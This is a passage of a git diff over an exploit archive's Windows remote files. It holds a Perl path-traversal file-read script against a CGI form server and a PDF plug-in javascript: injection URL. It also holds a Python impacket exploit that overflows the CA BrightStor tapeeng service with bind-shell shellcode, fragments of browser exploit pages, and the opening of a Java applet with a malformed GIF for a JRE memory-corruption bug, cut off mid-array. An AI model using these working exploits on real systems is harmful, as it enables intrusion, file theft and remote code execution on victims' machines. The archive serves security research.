index 1c79d92ad..fececd86a 100755
--- a/platforms/windows/remote/3063.pl
+++ b/platforms/windows/remote/3063.pl
@@ -1,20 +1,20 @@
-#!perl
-#found by Bl0od3r
-#visit http://dc3.dl.am  
-#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
-#developer:http://www.fersch.de/formbankserver/
-use LWP::Simple;
-sub usage
-{
-die("file.pl host.com /../file.txt");
-}
-$host= $ARGV[0];
-$file= $ARGV[1];
-if (!$host) {
-die("No Host.");
-} ; if (!$file) {
-die("No File.");
-}
-getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";
-
-# milw0rm.com [2007-01-01]
+#!perl
+#found by Bl0od3r
+#visit http://dc3.dl.am  
+#download:http://www.download-tipp.de/cgi-bin/jump.cgi?ID=8796
+#developer:http://www.fersch.de/formbankserver/
+use LWP::Simple;
+sub usage
+{
+die("file.pl host.com /../file.txt");
+}
+$host= $ARGV[0];
+$file= $ARGV[1];
+if (!$host) {
+die("No Host.");
+} ; if (!$file) {
+die("No File.");
+}
+getprint "http://".$host ."/cgi-bin/formbankcgi.exe/AbfrageForm?Name=".$ARGV[1]."%00";
+
+# milw0rm.com [2007-01-01]
diff --git a/platforms/windows/remote/3084.txt b/platforms/windows/remote/3084.txt
index bcf17609f..bbe7721a5 100755
--- a/platforms/windows/remote/3084.txt
+++ b/platforms/windows/remote/3084.txt
@@ -1,12 +1,12 @@
-# Stefano Di Paola
-# http://www.wisec.it/
-
-From Secunia:
-Input passed to a hosted PDF file is not properly sanitised by the browser plug-in
-before being returned to users. This can be exploited to execute arbitrary script code in
-a user's browser session in context of an affected site.
-
-Example:
-- http://[host]/[filename].pdf#[some text]=javascript:[code]
-
-# milw0rm.com [2007-01-05]
+# Stefano Di Paola
+# http://www.wisec.it/
+
+From Secunia:
+Input passed to a hosted PDF file is not properly sanitised by the browser plug-in
+before being returned to users. This can be exploited to execute arbitrary script code in
+a user's browser session in context of an affected site.
+
+Example:
+- http://[host]/[filename].pdf#[some text]=javascript:[code]
+
+# milw0rm.com [2007-01-05]
diff --git a/platforms/windows/remote/3086.py b/platforms/windows/remote/3086.py
index ed98fd758..9307d57b3 100755
--- a/platforms/windows/remote/3086.py
+++ b/platforms/windows/remote/3086.py
@@ -1,89 +1,89 @@
-#!/usr/bin/python
-# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve
-# tapeeng.exe service. Tested on windows 2000 SP4. Binds shell to TCP port 4443
-#
-# Winny M Thomas ;-)
-# Author shall bear no responsibility for any screw ups caused by using this code
-
-
-from impacket.dcerpc import transport, dcerpc
-from impacket import uuid
-import sys
-
-def EnableDetailLogging(target):
-       trans = transport.TCPTransport(target, 6502)
-       #On some linux systems the following call to connect may fail due to
-       #no support of settimeout in socket module. Comment out that line in
-       #transport.py of impacket and run this script
-
-       try:
-               trans.connect()
-       except:
-               print 'Could not connect to target port; Target may not be running tapeeng'
-               sys.exit(-1)
-
-       dce = dcerpc.DCERPC_v5(trans)
-       dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
-
-       #RPC request to enable detail logging
-       request = '\x00\x04\x08\x0c'
-       request += '\x02\x00\x00\x00'
-       request += '\x00\x00\x00\x00'
-       request += '\x00\x00\x00\x00'
-       request += '\x00\x00\x00\x00'
-
-       dce.call(43, request)
-
-def DCEconnectAndExploit(target):
-       trans = transport.TCPTransport(target, 6502)
-       trans.connect()
-       dce = dcerpc.DCERPC_v5(trans)
-       dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
-
-       request  = '\x10\x09\xf9\x77'
-       request += '\x41'*1130
-       request += '\x90\x90\x90\x90\xeb\x08' #short jump into nops
-       request += '\xd2\x7b\x57\x7c' #call ebx address from kernel32.dll
-       request += '\x90' * 32
-       #Shellcode to bind shell to TCP port 3334
-       request += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
-       request += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
-       request += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
-       request += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
-       request += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
-       request += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
-       request += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
-       request += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
-       request += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
-       request += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
-       request += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
-       request += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
-       request += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
-       request += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
-       request += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
-       request += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
-       request += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
-       request += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
-       request += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
-       request += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
-       request += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
-       request += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
-       request += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
-       request += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
-       request += "\xba\xa6\xf5\x31\x39\x59\x23\xce"
-
-       dce.call(38, request)
-
-if __name__ == '__main__':
-       try:
-               target = sys.argv[1]
-       except IndexError:
-               print 'Usage: %s \n' % sys.argv[0]
-               sys.exit(-1)
-
-       EnableDetailLogging(target)
-       DCEconnectAndExploit(target)
-
-       print 'Exploit complete; Now telnet to port 4443 on target'
-
-# milw0rm.com [2007-01-05]
+#!/usr/bin/python
+# Remote exploit for buffer overflow vulnerability in CA BrightStor Arcserve
+# tapeeng.exe service. Tested on windows 2000 SP4. Binds shell to TCP port 4443
+#
+# Winny M Thomas ;-)
+# Author shall bear no responsibility for any screw ups caused by using this code
+
+
+from impacket.dcerpc import transport, dcerpc
+from impacket import uuid
+import sys
+
+def EnableDetailLogging(target):
+       trans = transport.TCPTransport(target, 6502)
+       #On some linux systems the following call to connect may fail due to
+       #no support of settimeout in socket module. Comment out that line in
+       #transport.py of impacket and run this script
+
+       try:
+               trans.connect()
+       except:
+               print 'Could not connect to target port; Target may not be running tapeeng'
+               sys.exit(-1)
+
+       dce = dcerpc.DCERPC_v5(trans)
+       dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
+
+       #RPC request to enable detail logging
+       request = '\x00\x04\x08\x0c'
+       request += '\x02\x00\x00\x00'
+       request += '\x00\x00\x00\x00'
+       request += '\x00\x00\x00\x00'
+       request += '\x00\x00\x00\x00'
+
+       dce.call(43, request)
+
+def DCEconnectAndExploit(target):
+       trans = transport.TCPTransport(target, 6502)
+       trans.connect()
+       dce = dcerpc.DCERPC_v5(trans)
+       dce.bind(uuid.uuidtup_to_bin(('62b93df0-8b02-11ce-876c-00805f842837','1.0')))
+
+       request  = '\x10\x09\xf9\x77'
+       request += '\x41'*1130
+       request += '\x90\x90\x90\x90\xeb\x08' #short jump into nops
+       request += '\xd2\x7b\x57\x7c' #call ebx address from kernel32.dll
+       request += '\x90' * 32
+       #Shellcode to bind shell to TCP port 3334
+       request += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73"
+       request += "\x13\xe9\x59\x23\xce\x83\xeb\xfc\xe2\xf4\x15\x33\xc8\x83"
+       request += "\x01\xa0\xdc\x31\x16\x39\xa8\xa2\xcd\x7d\xa8\x8b\xd5\xd2"
+       request += "\x5f\xcb\x91\x58\xcc\x45\xa6\x41\xa8\x91\xc9\x58\xc8\x87"
+       request += "\x62\x6d\xa8\xcf\x07\x68\xe3\x57\x45\xdd\xe3\xba\xee\x98"
+       request += "\xe9\xc3\xe8\x9b\xc8\x3a\xd2\x0d\x07\xe6\x9c\xbc\xa8\x91"
+       request += "\xcd\x58\xc8\xa8\x62\x55\x68\x45\xb6\x45\x22\x25\xea\x75"
+       request += "\xa8\x47\x85\x7d\x3f\xaf\x2a\x68\xf8\xaa\x62\x1a\x13\x45"
+       request += "\xa9\x55\xa8\xbe\xf5\xf4\xa8\x8e\xe1\x07\x4b\x40\xa7\x57"
+       request += "\xcf\x9e\x16\x8f\x45\x9d\x8f\x31\x10\xfc\x81\x2e\x50\xfc"
+       request += "\xb6\x0d\xdc\x1e\x81\x92\xce\x32\xd2\x09\xdc\x18\xb6\xd0"
+       request += "\xc6\xa8\x68\xb4\x2b\xcc\xbc\x33\x21\x31\x39\x31\xfa\xc7"
+       request += "\x1c\xf4\x74\x31\x3f\x0a\x70\x9d\xba\x0a\x60\x9d\xaa\x0a"
+       request += "\xdc\x1e\x8f\x31\x32\x95\x8f\x0a\xaa\x2f\x7c\x31\x87\xd4"
+       request += "\x99\x9e\x74\x31\x3f\x33\x33\x9f\xbc\xa6\xf3\xa6\x4d\xf4"
+       request += "\x0d\x27\xbe\xa6\xf5\x9d\xbc\xa6\xf3\xa6\x0c\x10\xa5\x87"
+       request += "\xbe\xa6\xf5\x9e\xbd\x0d\x76\x31\x39\xca\x4b\x29\x90\x9f"
+       request += "\x5a\x99\x16\x8f\x76\x31\x39\x3f\x49\xaa\x8f\x31\x40\xa3"
+       request += "\x60\xbc\x49\x9e\xb0\x70\xef\x47\x0e\x33\x67\x47\x0b\x68"
+       request += "\xe3\x3d\x43\xa7\x61\xe3\x17\x1b\x0f\x5d\x64\x23\x1b\x65"
+       request += "\x42\xf2\x4b\xbc\x17\xea\x35\x31\x9c\x1d\xdc\x18\xb2\x0e"
+       request += "\x71\x9f\xb8\x08\x49\xcf\xb8\x08\x76\x9f\x16\x89\x4b\x63"
+       request += "\x30\x5c\xed\x9d\x16\x8f\x49\x31\x16\x6e\xdc\x1e\x62\x0e"
+       request += "\xdf\x4d\x2d\x3d\xdc\x18\xbb\xa6\xf3\xa6\x19\xd3\x27\x91"
+       request += "\xba\xa6\xf5\x31\x39\x59\x23\xce"
+
+       dce.call(38, request)
+
+if __name__ == '__main__':
+       try:
+               target = sys.argv[1]
+       except IndexError:
+               print 'Usage: %s \n' % sys.argv[0]
+               sys.exit(-1)
+
+       EnableDetailLogging(target)
+       DCEconnectAndExploit(target)
+
+       print 'Exploit complete; Now telnet to port 4443 on target'
+
+# milw0rm.com [2007-01-05]
diff --git a/platforms/windows/remote/310.txt b/platforms/windows/remote/310.txt
index ffc5abc80..2d6ae66a4 100755
--- a/platforms/windows/remote/310.txt
+++ b/platforms/windows/remote/310.txt
@@ -56,6 +56,6 @@ setTimeout("injectIt()", 1000);
 response.setStatus(302);
 response.setHeader("Location", "URL:res://shdoclc.dll/HTTP_501.htm"); 
 %>
-
-
-# milw0rm.com [2004-07-09]
+
+
+# milw0rm.com [2004-07-09]
diff --git a/platforms/windows/remote/313.txt b/platforms/windows/remote/313.txt
index 92c6b0d21..5da436b3c 100755
--- a/platforms/windows/remote/313.txt
+++ b/platforms/windows/remote/313.txt
@@ -8,6 +8,6 @@ Example:
    height="100%" border=3> 
     Click this link: The Better Browser 
-
-# milw0rm.com [2004-07-13]
+   );parent.setTimeout('showalert()',3000);">The Better Browser 
+
+# milw0rm.com [2004-07-13]
diff --git a/platforms/windows/remote/315.txt b/platforms/windows/remote/315.txt
index b30829297..8066e0b23 100755
--- a/platforms/windows/remote/315.txt
+++ b/platforms/windows/remote/315.txt
@@ -8,6 +8,6 @@ Content-Type:text/html
 click here to test
 
-
-
-# milw0rm.com [2004-07-13]
+
+
+# milw0rm.com [2004-07-13]
diff --git a/platforms/windows/remote/316.txt b/platforms/windows/remote/316.txt
index c80c0b9ac..d3cb91ba0 100755
--- a/platforms/windows/remote/316.txt
+++ b/platforms/windows/remote/316.txt
@@ -69,6 +69,6 @@ Response.Status = "302 Found"
 Response.AddHeader "Content-Length", "4"
 Response.AddHeader "Location","URL:res://shdoclc.dll/HTTP_501.htm"
 %>
-
-
-# milw0rm.com [2004-07-13]
+
+
+# milw0rm.com [2004-07-13]
diff --git a/platforms/windows/remote/3168.java b/platforms/windows/remote/3168.java
index 392934c21..fa4b19230 100755
--- a/platforms/windows/remote/3168.java
+++ b/platforms/windows/remote/3168.java
@@ -1,280 +1,280 @@
-/*
-*
-* FileName: JvmGifVulPoc.java
-*
-* Date: 2007-01-21
-*
-* Description: Sun Microsystems Java GIF File Parsing Memory Corruption Vulnerability Prove Of Concept Exploit
-*
-* Environment: Only successfully tested on Sun Jre 1.5
-*
-* Author: luoluo
-*
-* Contact: luoluonet_at_hotmail.com || luoluonet_at_126.com || luoluonet_at_yahoo.com
-*
-* Team: PST(Ph4nt0m Security Team, http://www.ph4nt0m.org) from P.R.C.
-*
-* Thanks YunShu very much, he helps to find a simple way to modify the width of image block.
-* Thanks all friends from ph4nt0m secutiry team, espacially Axis SuperHei Onlyu Nop EnvyMask CoCo OYXin Mix and etc.
-* Best wishes to the newly married couple TomyChen and his wife!
-*
-* 
-*/
-
-import java.io.*;
-import java.applet.*;
-import javax.imageio.*;
-import java.util.*;
-import java.awt.*;
-
-public class JvmGifVulPoc extends Applet {
-	private Image image = null;	
-	byte[] imageBytes = new byte[]
-	{
-		(byte)0x47, (byte)0x49, (byte)0x46, (byte)0x38, (byte)0x39, (byte)0x61, (byte)0x96, (byte)0x00, (byte)0x8c, (byte)0x00, (byte)0xe6, (byte)0x00, (byte)0x00, (byte)0x2d, (byte)0x20, (byte)0x21,
-		(byte)0x4a, (byte)0x6c, (byte)0xbd, (byte)0x49, (byte)0x5b, (byte)0x91, (byte)0x7b, (byte)0x88, (byte)0xc4, (byte)0x69, (byte)0x59, (byte)0x51, (byte)0x6d, (byte)0x71, (byte)0x8e, (byte)0x5b,	
-		(byte)0x4b, (byte)0x39, (byte)0x7b, (byte)0x63, (byte)0x59, (byte)0xb8, (byte)0xaa, (byte)0x97, (byte)0xfe, (byte)0xf8, (byte)0xec, (byte)0x26, (byte)0x26, (byte)0x41, (byte)0x4b, (byte)0x47,
-		(byte)0x58, (byte)0x4a, (byte)0x6c, (byte)0xb3, (byte)0x91, (byte)0x7b, (byte)0x6f, (byte)0xf4, (byte)0xe7, (byte)0xda, (byte)0xa9, (byte)0x95, (byte)0x8c, (byte)0x60, (byte)0x5b, (byte)0x64,
-		(byte)0x52, (byte)0x3f, (byte)0x3a, (byte)0xea, (byte)0xd7, (byte)0xc6, (byte)0x45, (byte)0x4b, (byte)0x63, (byte)0x49, (byte)0x33, (byte)0x2e, (byte)0x3e, (byte)0x39, (byte)0x4e, (byte)0x5f,
-		(byte)0x6a, (byte)0x92, (byte)0x74, (byte)0x64, (byte)0x63, (byte)0xde, (byte)0xc8, (byte)0xbd, (byte)0xd4, (byte)0xb5, (byte)0xa3, (byte)0xa4, (byte)0x82, (byte)0x71, (byte)0x61, (byte)0x4b,
-		(byte)0x3b, (byte)0x7d, (byte)0x6c, (byte)0x6a, (byte)0x99, (byte)0x99, (byte)0x99, (byte)0x40, (byte)0x2c, (byte)0x28, (byte)0x52, (byte)0x6a, (byte)0xbe, (byte)0x52, (byte)0x5b, (byte)0x81,
-		(byte)0x76, (byte)0x7a, (byte)0x96, (byte)0x4a, (byte)0x3c, (byte)0x3a, (byte)0x52, (byte)0x6b, (byte)0xb5, (byte)0x33, (byte)0x33, (byte)0x66, (byte)0x50, (byte)0x6b, (byte)0xaf, (byte)0xbf,
-		(byte)0xc2, (byte)0xde, (byte)0x58, (byte)0x66, (byte)0x9b, (byte)0x72, (byte)0x5c, (byte)0x54, (byte)0x63, (byte)0x52, (byte)0x53, (byte)0x42, (byte)0x4f, (byte)0x7a, (byte)0xa6, (byte)0x9c,
-		(byte)0xa2, (byte)0x33, (byte)0x28, (byte)0x33, (byte)0xff, (byte)0xff, (byte)0xff, (byte)0xa4, (byte)0x8d, (byte)0x84, (byte)0xe3, (byte)0xbf, (byte)0xa5, (byte)0x43, (byte)0x32, (byte)0x3a,
-		(byte)0x54, (byte)0x30, (byte)0x2d, (byte)0x53, (byte)0x4a, (byte)0x4b, (byte)0x8c, (byte)0x81, (byte)0x8c, (byte)0x85, (byte)0x73, (byte)0x6c, (byte)0x85, (byte)0x6a, (byte)0x61, (byte)0x58,
-		(byte)0x6c, (byte)0xa6, (byte)0x63, (byte)0x52, (byte)0x4a, (byte)0x87, (byte)0x7b, (byte)0x7f, (byte)0xf6, (byte)0xee, (byte)0xe7, (byte)0x5c, (byte)0x60, (byte)0x7e, (byte)0xb6, (byte)0xb6,
-		(byte)0xd1, (byte)0x5a, (byte)0x51, (byte)0x54, (byte)0x62, (byte)0x58, (byte)0x5a, (byte)0x72, (byte)0x66, (byte)0x6b, (byte)0x53, (byte)0x73, (byte)0xb6, (byte)0x37, (byte)0x2a, (byte)0x26,
-		(byte)0xc9, (byte)0xa5, (byte)0x8e, (byte)0x47, (byte)0x43, (byte)0x4d, (byte)0x3b, (byte)0x37, (byte)0x3b, (byte)0x89, (byte)0x8c, (byte)0xa6, (byte)0x51, (byte)0x60, (byte)0x8f, (byte)0xd4,
-		(byte)0xd6, (byte)0xdc, (byte)0x55, (byte)0x43, (byte)0x44, (byte)0x4b, (byte)0x6b, (byte)0xc4, (byte)0x67, (byte)0x72, (byte)0x9d, (byte)0x55, (byte)0x51, (byte)0x68, (byte)0x55, (byte)0x73,
-		(byte)0xbd, (byte)0x40, (byte)0x44, (byte)0x60, (byte)0x8c, (byte)0x71, (byte)0x6f, (byte)0xb7, (byte)0x9c, (byte)0x8e, (byte)0xfe, (byte)0xfb, (byte)0xf6, (byte)0x41, (byte)0x31, (byte)0x2c,
-		(byte)0x52, (byte)0x64, (byte)0xa6, (byte)0x58, (byte)0x41, (byte)0x31, (byte)0x66, (byte)0x66, (byte)0x66, (byte)0x49, (byte)0x54, (byte)0x78, (byte)0xce, (byte)0xb8, (byte)0xb1, (byte)0xeb,
-		(byte)0xdc, (byte)0xd1, (byte)0xaa, (byte)0xa5, (byte)0xbe, (byte)0x5d, (byte)0x6f, (byte)0xac, (byte)0xe3, (byte)0xc8, (byte)0xb7, (byte)0x92, (byte)0x5b, (byte)0x5f, (byte)0xa1, (byte)0x84,
-		(byte)0x7c, (byte)0x65, (byte)0x69, (byte)0x7c, (byte)0x59, (byte)0x6b, (byte)0x9c, (byte)0xb0, (byte)0x90, (byte)0x7d, (byte)0x5a, (byte)0x49, (byte)0x41, (byte)0x4b, (byte)0x39, (byte)0x31,
-		(byte)0xe9, (byte)0xeb, (byte)0xf4, (byte)0x9c, (byte)0x94, (byte)0xad, (byte)0x74, (byte)0x63, (byte)0x59, (byte)0x33, (byte)0x33, (byte)0x33, (byte)0xc5, (byte)0xaa, (byte)0x9c, (byte)0x5a,
-		(byte)0x4c, (byte)0x4b, (byte)0x6a, (byte)0x52, (byte)0x4b, (byte)0xae, (byte)0x75, (byte)0x78, (byte)0x7b, (byte)0x69, (byte)0x62, (byte)0x74, (byte)0x7e, (byte)0xae, (byte)0x4a, (byte)0x40,
-		(byte)0x42, (byte)0x59, (byte)0x3e, (byte)0x3c, (byte)0x73, (byte)0x6c, (byte)0x74, (byte)0x51, (byte)0x39, (byte)0x2f, (byte)0xb5, (byte)0x9e, (byte)0x97, (byte)0x2f, (byte)0x2f, (byte)0x40,
-		(byte)0x52, (byte)0x4b, (byte)0x55, (byte)0xf6, (byte)0xef, (byte)0xdf, (byte)0x63, (byte)0x70, (byte)0xa3, (byte)0x6c, (byte)0x5c, (byte)0x5b, (byte)0x48, (byte)0x71, (byte)0xbb, (byte)0x7a,
-		(byte)0x70, (byte)0x77, (byte)0x3b, (byte)0x44, (byte)0x69, (byte)0x5b, (byte)0x72, (byte)0xb5, (byte)0x6a, (byte)0x55, (byte)0x51, (byte)0x4c, (byte)0x71, (byte)0xb6, (byte)0x5b, (byte)0x64,
-		(byte)0x90, (byte)0x64, (byte)0x4e, (byte)0x43, (byte)0x42, (byte)0x3a, (byte)0x3c, (byte)0x6c, (byte)0x7c, (byte)0xab, (byte)0x93, (byte)0x72, (byte)0x66, (byte)0x21, (byte)0xf9, (byte)0x04,
-		(byte)0x04, (byte)0x14, (byte)0x00, (byte)0xff, (byte)0x00, (byte)0x2c, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x00, (byte)0x8c, (byte)0x00, (byte)0x00, (byte)0x07,
-		(byte)0xff, (byte)0x80, (byte)0x24, (byte)0x82, (byte)0x83, (byte)0x84, (byte)0x85, (byte)0x86, (byte)0x87, (byte)0x88, (byte)0x89, (byte)0x8a, (byte)0x8b, (byte)0x8c, (byte)0x8d, (byte)0x8e,
-		(byte)0x8f, (byte)0x90, (byte)0x91, (byte)0x92, (byte)0x93, (byte)0x94, (byte)0x95, (byte)0x96, (byte)0x97, (byte)0x98, (byte)0x99, (byte)0x9a, (byte)0x9b, (byte)0x9c, (byte)0x9d, (byte)0x9e,
-		(byte)0x9f, (byte)0xa0, (byte)0xa1, (byte)0xa2, (byte)0xa3, (byte)0xa4, (byte)0xa5, (byte)0xa6, (byte)0xa7, (byte)0xa8, (byte)0x01, (byte)0x25, (byte)0x25, (byte)0x1f, (byte)0x75, (byte)0x23,
-		(byte)0x23, (byte)0x0c, (byte)0x1f, (byte)0x1f, (byte)0xaf, (byte)0xa9, (byte)0xb5, (byte)0xb6, (byte)0x8d, (byte)0xab, (byte)0xb2, (byte)0x51, (byte)0x02, (byte)0x77, (byte)0x51, (byte)0x1f,
-		(byte)0x0c, (byte)0x0c, (byte)0xb7, (byte)0xc2, (byte)0xc3, (byte)0x87, (byte)0x4b, (byte)0x27, (byte)0x0a, (byte)0x43, (byte)0x54, (byte)0x23, (byte)0x75, (byte)0xae, (byte)0x23, (byte)0xc4,
-		(byte)0xcf, (byte)0xa6, (byte)0x7a, (byte)0x7a, (byte)0xb2, (byte)0x7a, (byte)0x82, (byte)0x51, (byte)0x77, (byte)0x43, (byte)0x2c, (byte)0x0b, (byte)0x45, (byte)0xcc, (byte)0xb2, (byte)0xd0,
-		(byte)0xdf, (byte)0xa2, (byte)0xd2, (byte)0xd4, (byte)0x01, (byte)0x4b, (byte)0x02, (byte)0x0a, (byte)0x64, (byte)0x30, (byte)0x30, (byte)0x13, (byte)0x25, (byte)0x48, (byte)0xb3, (byte)0xe0,
-		(byte)0xef, (byte)0xa5, (byte)0x73, (byte)0x70, (byte)0x2c, (byte)0x30, (byte)0x2c, (byte)0x42, (byte)0x02, (byte)0xe3, (byte)0xf0, (byte)0xfa, (byte)0x9f, (byte)0x23, (byte)0xd8, (byte)0x2c,
-		(byte)0xff, (byte)0x64, (byte)0x26, (byte)0xd8, (byte)0xa8, (byte)0xb6, (byte)0xaf, (byte)0x20, (byte)0x27, (byte)0x3c, (byte)0x24, (byte)0x00, (byte)0xf4, (byte)0xf9, (byte)0xc7, (byte)0xa2,
-		(byte)0x02, (byte)0x88, (byte)0x1f, (byte)0x06, (byte)0x23, (byte)0x66, (byte)0xc2, (byte)0xc3, (byte)0x04, (byte)0x00, (byte)0x99, (byte)0x6c, (byte)0xf4, (byte)0x04, (byte)0x1e, (byte)0x92,
-		(byte)0x26, (byte)0xb1, (byte)0x63, (byte)0x22, (byte)0x71, (byte)0x02, (byte)0x98, (byte)0x90, (byte)0x61, (byte)0xf8, (byte)0x4f, (byte)0x48, (byte)0x91, (byte)0x25, (byte)0x1e, (byte)0x53,
-		(byte)0x3e, (byte)0x5a, (byte)0x42, (byte)0x42, (byte)0xc1, (byte)0x9a, (byte)0x3e, (byte)0x40, (byte)0x80, (byte)0x40, (byte)0x01, (byte)0xd2, (byte)0x47, (byte)0x19, (byte)0x12, (byte)0x24,
-		(byte)0xd2, (byte)0x72, (byte)0xaa, (byte)0xdc, (byte)0x49, (byte)0x08, (byte)0x8f, (byte)0x8a, (byte)0x7f, (byte)0x32, (byte)0x62, (byte)0xc2, (byte)0xf0, (byte)0x30, (byte)0x64, (byte)0x41,
-		(byte)0x14, (byte)0x42, (byte)0xe2, (byte)0x78, (byte)0x2a, (byte)0xb5, (byte)0x81, (byte)0x6d, (byte)0xc8, (byte)0x10, (byte)0x30, (byte)0x50, (byte)0xa2, (byte)0x42, (byte)0x59, (byte)0x53,
-		(byte)0x04, (byte)0x62, (byte)0x80, (byte)0x9c, (byte)0x1f, (byte)0x94, (byte)0xa6, (byte)0x24, (byte)0x68, (byte)0x4e, (byte)0x48, (byte)0x9c, (byte)0xa7, (byte)0x60, (byte)0xd2, (byte)0x01,
-		(byte)0x11, (byte)0x41, (byte)0x25, (byte)0xd7, (byte)0x07, (byte)0x8e, (byte)0x5a, (byte)0x3d, (byte)0x06, (byte)0x0b, (byte)0x20, (byte)0x00, (byte)0x0e, (byte)0x99, (byte)0x1e, (byte)0x32,
-		(byte)0xff, (byte)0xc0, (byte)0x84, (byte)0x1d, (byte)0x4a, (byte)0x61, (byte)0xc2, (byte)0x89, (byte)0x11, (byte)0x37, (byte)0xd1, (byte)0xa6, (byte)0x95, (byte)0x08, (byte)0xec, (byte)0xc3,
-		(byte)0x89, (byte)0x0a, (byte)0x6b, (byte)0xd6, (byte)0x98, (byte)0x39, (byte)0x92, (byte)0x0e, (byte)0x46, (byte)0xd4, (byte)0x38, (byte)0x27, (byte)0x6f, (byte)0x22, (byte)0x59, (byte)0xbb,
-		(byte)0x37, (byte)0x22, (byte)0xb0, (byte)0x25, (byte)0x2a, (byte)0x86, (byte)0xf8, (byte)0x08, (byte)0x2c, (byte)0x63, (byte)0x4d, (byte)0x61, (byte)0x18, (byte)0x11, (byte)0x74, (byte)0x20,
-		(byte)0x6d, (byte)0xdc, (byte)0x71, (byte)0x9a, (byte)0x0a, (byte)0x32, (byte)0x3e, (byte)0xe8, (byte)0x1c, (byte)0x39, (byte)0x22, (byte)0x43, (byte)0x84, (byte)0xe9, (byte)0x74, (byte)0x54,
-		(byte)0x18, (byte)0x30, (byte)0xab, (byte)0x43, (byte)0x90, (byte)0x73, (byte)0xc4, (byte)0x11, (byte)0x7b, (byte)0x78, (byte)0xc8, (byte)0xa0, (byte)0x93, (byte)0x42, (byte)0x46, (byte)0xe5,
-		(byte)0xc0, (byte)0x22, (byte)0x28, (byte)0x28, (byte)0x29, (byte)0xb1, (byte)0xba, (byte)0xb5, (byte)0xeb, (byte)0x82, (byte)0x51, (byte)0x40, (byte)0xcc, (byte)0xe8, (byte)0xc1, (byte)0x83,
-		(byte)0xb6, (byte)0xed, (byte)0xc0, (byte)0x6b, (byte)0x44, (byte)0x54, (byte)0x38, (byte)0x81, (byte)0xf2, (byte)0x77, (byte)0xc7, (byte)0x22, (byte)0x70, (byte)0xec, (byte)0x0c, (byte)0x4f,
-		(byte)0x41, (byte)0xc7, (byte)0x8c, (byte)0x99, (byte)0x08, (byte)0xa6, (byte)0x45, (byte)0xb0, (byte)0x50, (byte)0xd1, (byte)0xdc, (byte)0x99, (byte)0xf3, (byte)0x7d, (byte)0x1f, (byte)0xe6,
-		(byte)0xb4, (byte)0xe1, (byte)0x31, (byte)0xc3, (byte)0x4e, (byte)0x8f, (byte)0xf3, (byte)0x66, (byte)0x4c, (byte)0x47, (byte)0x88, (byte)0x00, (byte)0xa3, (byte)0x02, (byte)0x1e, (byte)0x41,
-		(byte)0xde, (byte)0xbf, (byte)0xc3, (byte)0xfb, (byte)0x60, (byte)0xa1, (byte)0xc3, (byte)0x0c, (byte)0x3a, (byte)0x76, (byte)0x38, (byte)0x9c, (byte)0xbf, (byte)0xb1, (byte)0x3e, (byte)0xc2,
-		(byte)0xe0, (byte)0x0a, (byte)0xec, (byte)0xe8, (byte)0xf1, (byte)0x4a, (byte)0x7c, (byte)0xf2, (byte)0x7d, (byte)0x33, (byte)0x41, (byte)0x0f, (byte)0x1d, (byte)0xe0, (byte)0xd0, (byte)0xc3,
-		(byte)0x05, (byte)0x17, (byte)0x10, (byte)0x30, (byte)0xd8, (byte)0x17, (byte)0x37, (byte)0xf0, (byte)0xc7, (byte)0x42, (byte)0x14, (byte)0xdd, (byte)0x9c, (byte)0x55, (byte)0xe0, (byte)0x37,
-		(byte)0x48, (byte)0x94, (byte)0x10, (byte)0x82, (byte)0x0f, (byte)0x3e, (byte)0xcc, (byte)0x80, (byte)0x03, (byte)0x1d, (byte)0x17, (byte)0xd0, (byte)0xf1, (byte)0xc5, (byte)0x88, (byte)0x37,
